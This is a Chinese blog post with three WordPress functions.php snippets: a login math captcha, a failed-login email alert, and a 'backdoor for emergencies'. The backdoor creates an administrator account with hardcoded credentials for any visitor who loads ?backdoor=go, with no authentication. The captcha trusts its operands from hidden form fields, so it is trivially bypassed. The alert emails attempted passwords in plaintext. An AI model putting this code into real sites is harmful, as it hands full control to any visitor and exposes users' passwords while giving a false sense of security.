WordPress后台登录添加数学验证码

下面介绍下如何实现该功能。
添加以下代码至functions.php中:

//后台登陆数学验证码
function myplugin_add_login_fields() {
//获取两个随机数, 范围0~9
$num1=rand(0,9);
$num2=rand(0,9);
//最终网页中的具体内容
    echo "<p><label for='math' class='small'>验证码</label><br /> $num1 + $num2 = ?<input type='text' name='sum' class='input' value='' size='25' tabindex='4'>"
."<input type='hidden' name='num1' value='$num1'>"
."<input type='hidden' name='num2' value='$num2'></p>";
}
add_action('login_form','myplugin_add_login_fields');
function login_val() {
$sum=$_POST['sum'];//用户提交的计算结果
switch($sum){
//得到正确的计算结果则直接跳出
case $_POST['num1']+$_POST['num2']:break;
//未填写结果时的错误讯息
case null:wp_die('错误: 请输入验证码.');break;
//计算错误时的错误讯息
default:wp_die('错误: 验证码错误,请重试.');
}
}
add_action('login_form_login','login_val');

后台登陆效果如下所示:
123

WordPress登陆失败自动发送邮件提醒

说到原理其实很简单,就是利用了wp_login_failed这个wordpress的hook,一旦触发该hook,就发送邮件至管理员处。
添加以下代码至functions.php中:

// 博客后台登录失败时发送邮件通知管理员
 
function wp_login_failed_notify()
{
    date_default_timezone_set('PRC');
    $admin_email = get_bloginfo('admin_email');
    $to = $admin_email;
 
    $subject = '【登录失败】有人使用了错误的用户名或密码登录『' . get_bloginfo('name') . '』';
 
    $message = '<span style="color:red; font-weight: bold;">『' . get_bloginfo('name') . '』有一条登录失败的记录产生,若登录操作不是您产生的,请及时注意网站安全!</span><br /><br />';
    $message .= '登录名:' . $_POST['log'];
    $message .= '<br />尝试的密码:' . $_POST['pwd'];
    $message .= '<br />登录的时间:' . date("Y-m-d H:i:s");
    $message .= '<br />登录的 IP:' . $_SERVER['REMOTE_ADDR'];
    $message .= '<br /><br />';
    $message .= '您可以: <a href="' . get_bloginfo('url') . '" target="_target">进入' . get_bloginfo('name') . '»</a>';
 
    wp_mail( $to, $subject, $message, "Content-Type: text/html; charset=UTF-8" );
}
 
add_action('wp_login_failed', 'wp_login_failed_notify');

为WORDPRESS添加后门 以备不时之需

黑客往往会在他人网站上创建隐秘的后门,从此进出网站畅通无阻。但不要以为后门一定会给我们带来坏处,当忘记管理员密码时,可以通过访问特定的地址来创建一个具有管理权限的WordPress用户。今天WP酷就与大家一起探讨,如何在紧急时为WordPress创建后门。

  在主题目录functions.php中添加以下代码:

add_action('wp_head', 'creatbackdoor');
function creatbackdoor() {
        If ($_GET['backdoor'] == 'go') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('username', 'password');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}

将username和password分别更改为所要创建的管理员用户名以及密码,所创建的后门地址为:example.com/?backdoor=go,当然此段代码可以再进行二次开发,只需修改其中的set_role即可指定所创建用户的权限,由此可以将此段代码再次拓展,用作于自动创建测试用户等等。

标签:web安全, WordPress

你的评论